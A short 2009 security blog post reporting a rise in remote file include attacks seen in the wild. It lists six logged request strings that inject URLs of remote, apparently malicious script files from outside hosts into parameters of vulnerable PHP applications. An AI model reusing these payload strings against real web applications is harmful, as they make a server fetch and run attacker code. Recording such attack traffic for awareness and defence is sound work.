Home :: blogs :: secgeeks's blog

Remote FIle Include Vulnerabilities getting exploited in wild?

By secgeeks - Posted on January 26th, 2009
827
vote

Previously i posted an article on secgeeks.com regarding remote file include vulnerabilities,i am constantly seeing and increase in such requests . following url contains so called malicious files(adding them with request file):
secure.php?cfgProgDir=http://www.kmt-s.ru/chid.txt???

//sofi_webgui/hu/modules/reg-new/modstart.php?mod_dir=http://203.114.112.155/webboard1234/1.jpg?

minibb/index.php?absolute_path=http://www.beautifulchurch.org/images/main/main.js

cyberfolio/portfolio/msg/view.php?av=http://www.sacot-dz.com/webmail/logs/log.txt????

//skysilver/login.tpl.php?theme=http://www.inabima.org//safe.txt?????????

//index1.php?=http://ext-group.ru/download/vnc/albania.txt??

and many more...

Bookmark/Search this post with:
  • Delicious
  • Digg
  • StumbleUpon
  • Propeller
  • Reddit
  • Magnoliacom
  • Newsvine
  • Newskicks
  • Furl
  • Facebook
  • Google
  • Yahoo
  • Technorati
  • Icerocket

Trackback URL for this post:

http://secgeeks.com/trackback/2661